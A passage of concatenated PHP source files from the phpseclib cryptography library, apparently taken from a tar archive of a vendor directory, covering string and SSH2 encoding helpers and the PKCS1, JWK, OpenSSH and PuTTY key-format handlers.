phpseclib3\Math\Common\FiniteField; /** * Common String Functions * * @author Jim Wigginton */ abstract class Strings { /** * String Shift * * Inspired by array_shift * * @param string $string * @param int $index * @return string */ public static function shift(&$string, $index = 1) { $substr = substr($string, 0, $index); $string = substr($string, $index); return $substr; } /** * String Pop * * Inspired by array_pop * * @param string $string * @param int $index * @return string */ public static function pop(&$string, $index = 1) { $substr = substr($string, -$index); $string = substr($string, 0, -$index); return $substr; } /** * Parse SSH2-style string * * Returns either an array or a boolean if $data is malformed. * * Valid characters for $format are as follows: * * C = byte * b = boolean (true/false) * N = uint32 * Q = uint64 * s = string * i = mpint * L = name-list * * uint64 is not supported. * * @param string $format * @param string $data * @return mixed */ public static function unpackSSH2($format, &$data) { $format = self::formatPack($format); $result = []; for ($i = 0; $i < strlen($format); $i++) { switch ($format[$i]) { case 'C': case 'b': if (!strlen($data)) { throw new \LengthException('At least one byte needs to be present for successful C / b decodes'); } break; case 'N': case 'i': case 's': case 'L': if (strlen($data) < 4) { throw new \LengthException('At least four byte needs to be present for successful N / i / s / L decodes'); } break; case 'Q': if (strlen($data) < 8) { throw new \LengthException('At least eight byte needs to be present for successful N / i / s / L decodes'); } break; default: throw new \InvalidArgumentException('$format contains an invalid character'); } switch ($format[$i]) { case 'C': $result[] = ord(self::shift($data)); continue 2; case 'b': $result[] = ord(self::shift($data)) != 0; continue 2; case 'N': list(, $temp) = unpack('N', self::shift($data, 4)); $result[] = $temp; continue 2; case 'Q': // pack() added support for Q in PHP 5.6.3 and PHP 5.6 is phpseclib 3's minimum version // so in theory we could support this BUT, "64-bit format codes are not available for // 32-bit versions" and phpseclib works on 32-bit installs. on 32-bit installs // 64-bit floats can be used to get larger numbers then 32-bit signed ints would allow // for. sure, you're not gonna get the full precision of 64-bit numbers but just because // you need > 32-bit precision doesn't mean you need the full 64-bit precision extract(unpack('Nupper/Nlower', self::shift($data, 8))); $temp = $upper ? 4294967296 * $upper : 0; $temp += $lower < 0 ? ($lower & 0x7FFFFFFFF) + 0x80000000 : $lower; // $temp = hexdec(bin2hex(self::shift($data, 8))); $result[] = $temp; continue 2; } list(, $length) = unpack('N', self::shift($data, 4)); if (strlen($data) < $length) { throw new \LengthException("$length bytes needed; " . strlen($data) . ' bytes available'); } $temp = self::shift($data, $length); switch ($format[$i]) { case 'i': $result[] = new BigInteger($temp, -256); break; case 's': $result[] = $temp; break; case 'L': $result[] = explode(',', $temp); } } return $result; } /** * Create SSH2-style string * * @param string $format * @param string|int|float|array|bool ...$elements * @return string */ public static function packSSH2($format, ...$elements) { $format = self::formatPack($format); if (strlen($format) != count($elements)) { throw new \InvalidArgumentException('There must be as many arguments as there are characters in the $format string'); } $result = ''; for ($i = 0; $i < strlen($format); $i++) { $element = $elements[$i]; switch ($format[$i]) { case 'C': if (!is_int($element)) { throw new \InvalidArgumentException('Bytes must be represented as an integer between 0 and 255, inclusive.'); } $result .= pack('C', $element); break; case 'b': if (!is_bool($element)) { throw new \InvalidArgumentException('A boolean parameter was expected.'); } $result .= $element ? "\1" : "\0"; break; case 'Q': if (!is_int($element) && !is_float($element)) { throw new \InvalidArgumentException('An integer was expected.'); } // 4294967296 == 1 << 32 $result .= pack('NN', $element / 4294967296, $element); break; case 'N': if (is_float($element)) { $element = (int) $element; } if (!is_int($element)) { throw new \InvalidArgumentException('An integer was expected.'); } $result .= pack('N', $element); break; case 's': if (!self::is_stringable($element)) { throw new \InvalidArgumentException('A string was expected.'); } $result .= pack('Na*', strlen($element), $element); break; case 'i': if (!$element instanceof BigInteger && !$element instanceof FiniteField\Integer) { throw new \InvalidArgumentException('A phpseclib3\Math\BigInteger or phpseclib3\Math\Common\FiniteField\Integer object was expected.'); } $element = $element->toBytes(true); $result .= pack('Na*', strlen($element), $element); break; case 'L': if (!is_array($element)) { throw new \InvalidArgumentException('An array was expected.'); } $element = implode(',', $element); $result .= pack('Na*', strlen($element), $element); break; default: throw new \InvalidArgumentException('$format contains an invalid character'); } } return $result; } /** * Expand a pack string * * Converts C5 to CCCCC, for example. * * @param string $format * @return string */ private static function formatPack($format) { $parts = preg_split('#(\d+)#', $format, -1, PREG_SPLIT_DELIM_CAPTURE); $format = ''; for ($i = 1; $i < count($parts); $i += 2) { $format .= substr($parts[$i - 1], 0, -1) . str_repeat(substr($parts[$i - 1], -1), $parts[$i]); } $format .= $parts[$i - 1]; return $format; } /** * Convert binary data into bits * * bin2hex / hex2bin refer to base-256 encoded data as binary, whilst * decbin / bindec refer to base-2 encoded data as binary. For the purposes * of this function, bin refers to base-256 encoded data whilst bits refers * to base-2 encoded data * * @param string $x * @return string */ public static function bits2bin($x) { /* // the pure-PHP approach is faster than the GMP approach if (function_exists('gmp_export')) { return strlen($x) ? gmp_export(gmp_init($x, 2)) : gmp_init(0); } */ if (preg_match('#[^01]#', $x)) { throw new \RuntimeException('The only valid characters are 0 and 1'); } if (!defined('PHP_INT_MIN')) { define('PHP_INT_MIN', ~PHP_INT_MAX); } $length = strlen($x); if (!$length) { return ''; } $block_size = PHP_INT_SIZE << 3; $pad = $block_size - ($length % $block_size); if ($pad != $block_size) { $x = str_repeat('0', $pad) . $x; } $parts = str_split($x, $block_size); $str = ''; foreach ($parts as $part) { $xor = $part[0] == '1' ? PHP_INT_MIN : 0; $part[0] = '0'; $str .= pack( PHP_INT_SIZE == 4 ? 'N' : 'J', $xor ^ eval('return 0b' . $part . ';') ); } return ltrim($str, "\0"); } /** * Convert bits to binary data * * @param string $x * @return string */ public static function bin2bits($x, $trim = true) { /* // the pure-PHP approach is slower than the GMP approach BUT // i want to the pure-PHP version to be easily unit tested as well if (function_exists('gmp_import')) { return gmp_strval(gmp_import($x), 2); } */ $len = strlen($x); $mod = $len % PHP_INT_SIZE; if ($mod) { $x = str_pad($x, $len + PHP_INT_SIZE - $mod, "\0", STR_PAD_LEFT); } $bits = ''; if (PHP_INT_SIZE == 4) { $digits = unpack('N*', $x); foreach ($digits as $digit) { $bits .= sprintf('%032b', $digit); } } else { $digits = unpack('J*', $x); foreach ($digits as $digit) { $bits .= sprintf('%064b', $digit); } } return $trim ? ltrim($bits, '0') : $bits; } /** * Switch Endianness Bit Order * * @param string $x * @return string */ public static function switchEndianness($x) { $r = ''; for ($i = strlen($x) - 1; $i >= 0; $i--) { $b = ord($x[$i]); if (PHP_INT_SIZE === 8) { // 3 operations // from http://graphics.stanford.edu/~seander/bithacks.html#ReverseByteWith64BitsDiv $r .= chr((($b * 0x0202020202) & 0x010884422010) % 1023); } else { // 7 operations // from http://graphics.stanford.edu/~seander/bithacks.html#ReverseByteWith32Bits $p1 = ($b * 0x0802) & 0x22110; $p2 = ($b * 0x8020) & 0x88440; $r .= chr( (($p1 | $p2) * 0x10101) >> 16 ); } } return $r; } /** * Increment the current string * * @param string $var * @return string */ public static function increment_str(&$var) { if (function_exists('sodium_increment')) { $var = strrev($var); sodium_increment($var); $var = strrev($var); return $var; } for ($i = 4; $i <= strlen($var); $i += 4) { $temp = substr($var, -$i, 4); switch ($temp) { case "\xFF\xFF\xFF\xFF": $var = substr_replace($var, "\x00\x00\x00\x00", -$i, 4); break; case "\x7F\xFF\xFF\xFF": $var = substr_replace($var, "\x80\x00\x00\x00", -$i, 4); return $var; default: $temp = unpack('Nnum', $temp); $var = substr_replace($var, pack('N', $temp['num'] + 1), -$i, 4); return $var; } } $remainder = strlen($var) % 4; if ($remainder == 0) { return $var; } $temp = unpack('Nnum', str_pad(substr($var, 0, $remainder), 4, "\0", STR_PAD_LEFT)); $temp = substr(pack('N', $temp['num'] + 1), -$remainder); $var = substr_replace($var, $temp, 0, $remainder); return $var; } /** * Find whether the type of a variable is string (or could be converted to one) * * @param mixed $var * @return bool * @psalm-assert-if-true string|\Stringable $var */ public static function is_stringable($var) { return is_string($var) || (is_object($var) && method_exists($var, '__toString')); } /** * Constant Time Base64-decoding * * ParagoneIE\ConstantTime doesn't use libsodium if it's available so we'll do so * ourselves. see https://github.com/paragonie/constant_time_encoding/issues/39 * * @param string $data * @return string */ public static function base64_decode($data) { return function_exists('sodium_base642bin') ? sodium_base642bin($data, SODIUM_BASE64_VARIANT_ORIGINAL_NO_PADDING, '=') : Base64::decode($data); } /** * Constant Time Base64-decoding (URL safe) * * @param string $data * @return string */ public static function base64url_decode($data) { // return self::base64_decode(str_replace(['-', '_'], ['+', '/'], $data)); return function_exists('sodium_base642bin') ? sodium_base642bin($data, SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING, '=') : Base64UrlSafe::decode($data); } /** * Constant Time Base64-encoding * * @param string $data * @return string */ public static function base64_encode($data) { return function_exists('sodium_bin2base64') ? sodium_bin2base64($data, SODIUM_BASE64_VARIANT_ORIGINAL) : Base64::encode($data); } /** * Constant Time Base64-encoding (URL safe) * * @param string $data * @return string */ public static function base64url_encode($data) { // return str_replace(['+', '/'], ['-', '_'], self::base64_encode($data)); return function_exists('sodium_bin2base64') ? sodium_bin2base64($data, SODIUM_BASE64_VARIANT_URLSAFE) : Base64UrlSafe::encode($data); } /** * Constant Time Hex Decoder * * @param string $data * @return string */ public static function hex2bin($data) { return function_exists('sodium_hex2bin') ? sodium_hex2bin($data) : Hex::decode($data); } /** * Constant Time Hex Encoder * * @param string $data * @return string */ public static function bin2hex($data) { return function_exists('sodium_bin2hex') ? sodium_bin2hex($data) : Hex::encode($data); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PKCS1.php000064400000016434147600400120024172 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\AES; use phpseclib3\Crypt\DES; use phpseclib3\Crypt\Random; use phpseclib3\Crypt\TripleDES; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\File\ASN1; /** * PKCS1 Formatted Key Handler * * @author Jim Wigginton */ abstract class PKCS1 extends PKCS { /** * Default encryption algorithm * * @var string */ private static $defaultEncryptionAlgorithm = 'AES-128-CBC'; /** * Sets the default encryption algorithm * * @param string $algo */ public static function setEncryptionAlgorithm($algo) { self::$defaultEncryptionAlgorithm = $algo; } /** * Returns the mode constant corresponding to the mode string * * @param string $mode * @return int * @throws \UnexpectedValueException if the block cipher mode is unsupported */ private static function getEncryptionMode($mode) { switch ($mode) { case 'CBC': case 'ECB': case 'CFB': case 'OFB': case 'CTR': return $mode; } throw new \UnexpectedValueException('Unsupported block cipher mode of operation'); } /** * Returns a cipher object corresponding to a string * * @param string $algo * @return string * @throws \UnexpectedValueException if the encryption algorithm is unsupported */ private static function getEncryptionObject($algo) { $modes = '(CBC|ECB|CFB|OFB|CTR)'; switch (true) { case preg_match("#^AES-(128|192|256)-$modes$#", $algo, $matches): $cipher = new AES(self::getEncryptionMode($matches[2])); $cipher->setKeyLength($matches[1]); return $cipher; case preg_match("#^DES-EDE3-$modes$#", $algo, $matches): return new TripleDES(self::getEncryptionMode($matches[1])); case preg_match("#^DES-$modes$#", $algo, $matches): return new DES(self::getEncryptionMode($matches[1])); default: throw new UnsupportedAlgorithmException($algo . ' is not a supported algorithm'); } } /** * Generate a symmetric key for PKCS#1 keys * * @param string $password * @param string $iv * @param int $length * @return string */ private static function generateSymmetricKey($password, $iv, $length) { $symkey = ''; $iv = substr($iv, 0, 8); while (strlen($symkey) < $length) { $symkey .= md5($symkey . $password . $iv, true); } return substr($symkey, 0, $length); } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ protected static function load($key, $password) { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } /* Although PKCS#1 proposes a format that public and private keys can use, encrypting them is "outside the scope" of PKCS#1. PKCS#1 then refers you to PKCS#12 and PKCS#15 if you're wanting to protect private keys, however, that's not what OpenSSL* does. OpenSSL protects private keys by adding two new "fields" to the key - DEK-Info and Proc-Type. These fields are discussed here: http://tools.ietf.org/html/rfc1421#section- http://tools.ietf.org/html/rfc1421#section- DES-EDE3-CBC as an algorithm, however, is not discussed anywhere, near as I can tell. DES-CBC and DES-EDE are discussed in RFC1423, however, DES-EDE3-CBC isn't, nor is its key derivation function. As is, the definitive authority on this encoding scheme isn't the IETF but rather OpenSSL's own implementation. ie. the implementation *is* the standard and any bugs that may exist in that implementation are part of the standard, as well. * OpenSSL is the de facto standard. It's utilized by OpenSSH and other projects */ if (preg_match('#DEK-Info: (.+),(.+)#', $key, $matches)) { $iv = Strings::hex2bin(trim($matches[2])); // remove the Proc-Type / DEK-Info sections as they're no longer needed $key = preg_replace('#^(?:Proc-Type|DEK-Info): .*#m', '', $key); $ciphertext = ASN1::extractBER($key); if ($ciphertext === false) { $ciphertext = $key; } $crypto = self::getEncryptionObject($matches[1]); $crypto->setKey(self::generateSymmetricKey($password, $iv, $crypto->getKeyLength() >> 3)); $crypto->setIV($iv); $key = $crypto->decrypt($ciphertext); } else { if (self::$format != self::MODE_DER) { $decoded = ASN1::extractBER($key); if ($decoded !== false) { $key = $decoded; } elseif (self::$format == self::MODE_PEM) { throw new \UnexpectedValueException('Expected base64-encoded PEM format but was unable to decode base64 text'); } } } return $key; } /** * Wrap a private key appropriately * * @param string $key * @param string $type * @param string $password * @param array $options optional * @return string */ protected static function wrapPrivateKey($key, $type, $password, array $options = []) { if (empty($password) || !is_string($password)) { return "-----BEGIN $type PRIVATE KEY-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END $type PRIVATE KEY-----"; } $encryptionAlgorithm = isset($options['encryptionAlgorithm']) ? $options['encryptionAlgorithm'] : self::$defaultEncryptionAlgorithm; $cipher = self::getEncryptionObject($encryptionAlgorithm); $iv = Random::string($cipher->getBlockLength() >> 3); $cipher->setKey(self::generateSymmetricKey($password, $iv, $cipher->getKeyLength() >> 3)); $cipher->setIV($iv); $iv = strtoupper(Strings::bin2hex($iv)); return "-----BEGIN $type PRIVATE KEY-----\r\n" . "Proc-Type: 4,ENCRYPTED\r\n" . "DEK-Info: " . $encryptionAlgorithm . ",$iv\r\n" . "\r\n" . chunk_split(Strings::base64_encode($cipher->encrypt($key)), 64) . "-----END $type PRIVATE KEY-----"; } /** * Wrap a public key appropriately * * @param string $key * @param string $type * @return string */ protected static function wrapPublicKey($key, $type) { return "-----BEGIN $type PUBLIC KEY-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END $type PUBLIC KEY-----"; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/JWK.php000064400000003265147600400120024002 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Keys; use phpseclib3\Common\Functions\Strings; /** * JSON Web Key Formatted Key Handler * * @author Jim Wigginton */ abstract class JWK { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password * @return array */ public static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } $key = preg_replace('#\s#', '', $key); // remove whitespace if (PHP_VERSION_ID >= 73000) { $key = json_decode($key, null, 512, JSON_THROW_ON_ERROR); } else { $key = json_decode($key); if (!$key) { throw new \RuntimeException('Unable to decode JSON'); } } if (isset($key->kty)) { return $key; } if (count($key->keys) != 1) { throw new \RuntimeException('Although the JWK key format supports multiple keys phpseclib does not'); } return $key->keys[0]; } /** * Wrap a key appropriately * * @return string */ protected static function wrapKey(array $key, array $options) { return json_encode(['keys' => [$key + $options]]); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PKCS.php000064400000002541147600400120024103 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Keys; /** * PKCS1 Formatted Key Handler * * @author Jim Wigginton */ abstract class PKCS { /** * Auto-detect the format */ const MODE_ANY = 0; /** * Require base64-encoded PEM's be supplied */ const MODE_PEM = 1; /** * Require raw DER's be supplied */ const MODE_DER = 2; /**#@-*/ /** * Is the key a base-64 encoded PEM, DER or should it be auto-detected? * * @var int */ protected static $format = self::MODE_ANY; /** * Require base64-encoded PEM's be supplied * */ public static function requirePEM() { self::$format = self::MODE_PEM; } /** * Require raw DER's be supplied * */ public static function requireDER() { self::$format = self::MODE_DER; } /** * Accept any format and auto detect the format * * This is the default setting * */ public static function requireAny() { self::$format = self::MODE_ANY; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/OpenSSH.php000064400000017170147600400120024626 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\AES; use phpseclib3\Crypt\Random; /** * OpenSSH Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class OpenSSH { /** * Default comment * * @var string */ protected static $comment = 'phpseclib-generated-key'; /** * Binary key flag * * @var bool */ protected static $binary = false; /** * Sets the default comment * * @param string $comment */ public static function setComment($comment) { self::$comment = str_replace(["\r", "\n"], '', $comment); } /** * Break a public or private key down into its constituent components * * $type can be either ssh-dss or ssh-rsa * * @param string $key * @param string $password * @return array */ public static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } // key format is described here: // https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.key?annotate=HEAD if (strpos($key, 'BEGIN OPENSSH PRIVATE KEY') !== false) { $key = preg_replace('#(?:^-.*?-[\r\n]*$)|\s#ms', '', $key); $key = Strings::base64_decode($key); $magic = Strings::shift($key, 15); if ($magic != "openssh-key-v1\0") { throw new \RuntimeException('Expected openssh-key-v1'); } list($ciphername, $kdfname, $kdfoptions, $numKeys) = Strings::unpackSSH2('sssN', $key); if ($numKeys != 1) { // if we wanted to support multiple keys we could update PublicKeyLoader to preview what the # of keys // would be; it'd then call Common\Keys\OpenSSH.php::load() and get the paddedKey. it'd then pass // that to the appropriate key loading parser $numKey times or something throw new \RuntimeException('Although the OpenSSH private key format supports multiple keys phpseclib does not'); } switch ($ciphername) { case 'none': break; case 'aes256-ctr': if ($kdfname != 'bcrypt') { throw new \RuntimeException('Only the bcrypt kdf is supported (' . $kdfname . ' encountered)'); } list($salt, $rounds) = Strings::unpackSSH2('sN', $kdfoptions); $crypto = new AES('ctr'); //$crypto->setKeyLength(256); //$crypto->disablePadding(); $crypto->setPassword($password, 'bcrypt', $salt, $rounds, 32); break; default: throw new \RuntimeException('The only supported cipherse are: none, aes256-ctr (' . $ciphername . ' is being used)'); } list($publicKey, $paddedKey) = Strings::unpackSSH2('ss', $key); list($type) = Strings::unpackSSH2('s', $publicKey); if (isset($crypto)) { $paddedKey = $crypto->decrypt($paddedKey); } list($checkint1, $checkint2) = Strings::unpackSSH2('NN', $paddedKey); // any leftover bytes in $paddedKey are for padding? but they should be sequential bytes. eg. 1, 2, 3, etc. if ($checkint1 != $checkint2) { throw new \RuntimeException('The two checkints do not match'); } self::checkType($type); return compact('type', 'publicKey', 'paddedKey'); } $parts = explode(' ', $key, 3); if (!isset($parts[1])) { $key = base64_decode($parts[0]); $comment = false; } else { $asciiType = $parts[0]; self::checkType($parts[0]); $key = base64_decode($parts[1]); $comment = isset($parts[2]) ? $parts[2] : false; } if ($key === false) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } list($type) = Strings::unpackSSH2('s', $key); self::checkType($type); if (isset($asciiType) && $asciiType != $type) { throw new \RuntimeException('Two different types of keys are claimed: ' . $asciiType . ' and ' . $type); } if (strlen($key) <= 4) { throw new \UnexpectedValueException('Key appears to be malformed'); } $publicKey = $key; return compact('type', 'publicKey', 'comment'); } /** * Toggle between binary and printable keys * * Printable keys are what are generated by default. These are the ones that go in * $HOME/.ssh/authorized_key. * * @param bool $enabled */ public static function setBinaryOutput($enabled) { self::$binary = $enabled; } /** * Checks to see if the type is valid * * @param string $candidate */ private static function checkType($candidate) { if (!in_array($candidate, static::$types)) { throw new \RuntimeException("The key type ($candidate) is not equal to: " . implode(',', static::$types)); } } /** * Wrap a private key appropriately * * @param string $publicKey * @param string $privateKey * @param string $password * @param array $options * @return string */ protected static function wrapPrivateKey($publicKey, $privateKey, $password, $options) { list(, $checkint) = unpack('N', Random::string(4)); $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $paddedKey = Strings::packSSH2('NN', $checkint, $checkint) . $privateKey . Strings::packSSH2('s', $comment); $usesEncryption = !empty($password) && is_string($password); /* from http://tools.ietf.org/html/rfc4253#section-6 : Note that the length of the concatenation of 'packet_length', 'padding_length', 'payload', and 'random padding' MUST be a multiple of the cipher block size or 8, whichever is larger. */ $blockSize = $usesEncryption ? 16 : 8; $paddingLength = (($blockSize - 1) * strlen($paddedKey)) % $blockSize; for ($i = 1; $i <= $paddingLength; $i++) { $paddedKey .= chr($i); } if (!$usesEncryption) { $key = Strings::packSSH2('sssNss', 'none', 'none', '', 1, $publicKey, $paddedKey); } else { $rounds = isset($options['rounds']) ? $options['rounds'] : 16; $salt = Random::string(16); $kdfoptions = Strings::packSSH2('sN', $salt, $rounds); $crypto = new AES('ctr'); $crypto->setPassword($password, 'bcrypt', $salt, $rounds, 32); $paddedKey = $crypto->encrypt($paddedKey); $key = Strings::packSSH2('sssNss', 'aes256-ctr', 'bcrypt', $kdfoptions, 1, $publicKey, $paddedKey); } $key = "openssh-key-v1\0$key"; return "-----BEGIN OPENSSH PRIVATE KEY-----\n" . chunk_split(Strings::base64_encode($key), 70, "\n") . "-----END OPENSSH PRIVATE KEY-----\n"; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PuTTY.php000064400000032110147600400120024323 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\AES; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\Random; use phpseclib3\Exception\UnsupportedAlgorithmException; /** * PuTTY Formatted Key Handler * * @author Jim Wigginton */ abstract class PuTTY { /** * Default comment * * @var string */ private static $comment = 'phpseclib-generated-key'; /** * Default version * * @var int */ private static $version = 2; /** * Sets the default comment * * @param string $comment */ public static function setComment($comment) { self::$comment = str_replace(["\r", "\n"], '', $comment); } /** * Sets the default version * * @param int $version */ public static function setVersion($version) { if ($version != 2 && $version != 3) { throw new \RuntimeException('Only supported versions are 2 and 3'); } self::$version = $version; } /** * Generate a symmetric key for PuTTY v2 keys * * @param string $password * @param int $length * @return string */ private static function generateV2Key($password, $length) { $symkey = ''; $sequence = 0; while (strlen($symkey) < $length) { $temp = pack('Na*', $sequence++, $password); $symkey .= Strings::hex2bin(sha1($temp)); } return substr($symkey, 0, $length); } /** * Generate a symmetric key for PuTTY v3 keys * * @param string $password * @param string $flavour * @param int $memory * @param int $passes * @param string $salt * @return array */ private static function generateV3Key($password, $flavour, $memory, $passes, $salt) { if (!function_exists('sodium_crypto_pwhash')) { throw new \RuntimeException('sodium_crypto_pwhash needs to exist for Argon2 password hasing'); } switch ($flavour) { case 'Argon2i': $flavour = SODIUM_CRYPTO_PWHASH_ALG_ARGON2I13; break; case 'Argon2id': $flavour = SODIUM_CRYPTO_PWHASH_ALG_ARGON2ID13; break; default: throw new UnsupportedAlgorithmException('Only Argon2i and Argon2id are supported'); } $length = 80; // keylen + ivlen + mac_keylen $temp = sodium_crypto_pwhash($length, $password, $salt, $passes, $memory << 10, $flavour); $symkey = substr($temp, 0, 32); $symiv = substr($temp, 32, 16); $hashkey = substr($temp, -32); return compact('symkey', 'symiv', 'hashkey'); } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password * @return array */ public static function load($key, $password) { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } if (strpos($key, 'BEGIN SSH2 PUBLIC KEY') !== false) { $lines = preg_split('#[\r\n]+#', $key); switch (true) { case $lines[0] != '---- BEGIN SSH2 PUBLIC KEY ----': throw new \UnexpectedValueException('Key doesn\'t start with ---- BEGIN SSH2 PUBLIC KEY ----'); case $lines[count($lines) - 1] != '---- END SSH2 PUBLIC KEY ----': throw new \UnexpectedValueException('Key doesn\'t end with ---- END SSH2 PUBLIC KEY ----'); } $lines = array_splice($lines, 1, -1); $lines = array_map(function ($line) { return rtrim($line, "\r\n"); }, $lines); $data = $current = ''; $values = []; $in_value = false; foreach ($lines as $line) { switch (true) { case preg_match('#^(.*?): (.*)#', $line, $match): $in_value = $line[strlen($line) - 1] == '\\'; $current = strtolower($match[1]); $values[$current] = $in_value ? substr($match[2], 0, -1) : $match[2]; break; case $in_value: $in_value = $line[strlen($line) - 1] == '\\'; $values[$current] .= $in_value ? substr($line, 0, -1) : $line; break; default: $data .= $line; } } $components = call_user_func([static::PUBLIC_HANDLER, 'load'], $data); if ($components === false) { throw new \UnexpectedValueException('Unable to decode public key'); } $components += $values; $components['comment'] = str_replace(['\\\\', '\"'], ['\\', '"'], $values['comment']); return $components; } $components = []; $key = preg_split('#\r\n|\r|\n#', trim($key)); if (Strings::shift($key[0], strlen('PuTTY-User-Key-File-')) != 'PuTTY-User-Key-File-') { return false; } $version = (int) Strings::shift($key[0], 3); // should be either "2: " or "3: 0" prior to int casting if ($version != 2 && $version != 3) { throw new \RuntimeException('Only v2 and v3 PuTTY private keys are supported'); } $components['type'] = $type = rtrim($key[0]); if (!in_array($type, static::$types)) { $error = count(static::$types) == 1 ? 'Only ' . static::$types[0] . ' keys are supported. ' : ''; throw new UnsupportedAlgorithmException($error . 'This is an unsupported ' . $type . ' key'); } $encryption = trim(preg_replace('#Encryption: (.+)#', '$1', $key[1])); $components['comment'] = trim(preg_replace('#Comment: (.+)#', '$1', $key[2])); $publicLength = trim(preg_replace('#Public-Lines: (\d+)#', '$1', $key[3])); $public = Strings::base64_decode(implode('', array_map('trim', array_slice($key, 4, $publicLength)))); $source = Strings::packSSH2('ssss', $type, $encryption, $components['comment'], $public); extract(unpack('Nlength', Strings::shift($public, 4))); $newtype = Strings::shift($public, $length); if ($newtype != $type) { throw new \RuntimeException('The binary type does not match the human readable type field'); } $components['public'] = $public; switch ($version) { case 3: $hashkey = ''; break; case 2: $hashkey = 'putty-private-key-file-mac-key'; } $offset = $publicLength + 4; switch ($encryption) { case 'aes256-cbc': $crypto = new AES('cbc'); switch ($version) { case 3: $flavour = trim(preg_replace('#Key-Derivation: (.*)#', '$1', $key[$offset++])); $memory = trim(preg_replace('#Argon2-Memory: (\d+)#', '$1', $key[$offset++])); $passes = trim(preg_replace('#Argon2-Passes: (\d+)#', '$1', $key[$offset++])); $parallelism = trim(preg_replace('#Argon2-Parallelism: (\d+)#', '$1', $key[$offset++])); $salt = Strings::hex2bin(trim(preg_replace('#Argon2-Salt: ([0-9a-f]+)#', '$1', $key[$offset++]))); extract(self::generateV3Key($password, $flavour, $memory, $passes, $salt)); break; case 2: $symkey = self::generateV2Key($password, 32); $symiv = str_repeat("\0", $crypto->getBlockLength() >> 3); $hashkey .= $password; } } switch ($version) { case 3: $hash = new Hash('sha256'); $hash->setKey($hashkey); break; case 2: $hash = new Hash('sha1'); $hash->setKey(sha1($hashkey, true)); } $privateLength = trim(preg_replace('#Private-Lines: (\d+)#', '$1', $key[$offset++])); $private = Strings::base64_decode(implode('', array_map('trim', array_slice($key, $offset, $privateLength)))); if ($encryption != 'none') { $crypto->setKey($symkey); $crypto->setIV($symiv); $crypto->disablePadding(); $private = $crypto->decrypt($private); } $source .= Strings::packSSH2('s', $private); $hmac = trim(preg_replace('#Private-MAC: (.+)#', '$1', $key[$offset + $privateLength])); $hmac = Strings::hex2bin($hmac); if (!hash_equals($hash->hash($source), $hmac)) { throw new \UnexpectedValueException('MAC validation error'); } $components['private'] = $private; return $components; } /** * Wrap a private key appropriately * * @param string $public * @param string $private * @param string $type * @param string $password * @param array $options optional * @return string */ protected static function wrapPrivateKey($public, $private, $type, $password, array $options = []) { $encryption = (!empty($password) || is_string($password)) ? 'aes256-cbc' : 'none'; $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $version = isset($options['version']) ? $options['version'] : self::$version; $key = "PuTTY-User-Key-File-$version: $type\r\n"; $key .= "Encryption: $encryption\r\n"; $key .= "Comment: $comment\r\n"; $public = Strings::packSSH2('s', $type) . $public; $source = Strings::packSSH2('ssss', $type, $encryption, $comment, $public); $public = Strings::base64_encode($public); $key .= "Public-Lines: " . ((strlen($public) + 63) >> 6) . "\r\n"; $key .= chunk_split($public, 64); if (empty($password) && !is_string($password)) { $source .= Strings::packSSH2('s', $private); switch ($version) { case 3: $hash = new Hash('sha256'); $hash->setKey(''); break; case 2: $hash = new Hash('sha1'); $hash->setKey(sha1('putty-private-key-file-mac-key', true)); } } else { $private .= Random::string(16 - (strlen($private) & 15)); $source .= Strings::packSSH2('s', $private); $crypto = new AES('cbc'); switch ($version) { case 3: $salt = Random::string(16); $key .= "Key-Derivation: Argon2id\r\n"; $key .= "Argon2-Memory: 8192\r\n"; $key .= "Argon2-Passes: 13\r\n"; $key .= "Argon2-Parallelism: 1\r\n"; $key .= "Argon2-Salt: " . Strings::bin2hex($salt) . "\r\n"; extract(self::generateV3Key($password, 'Argon2id', 8192, 13, $salt)); $hash = new Hash('sha256'); $hash->setKey($hashkey); break; case 2: $symkey = self::generateV2Key($password, 32); 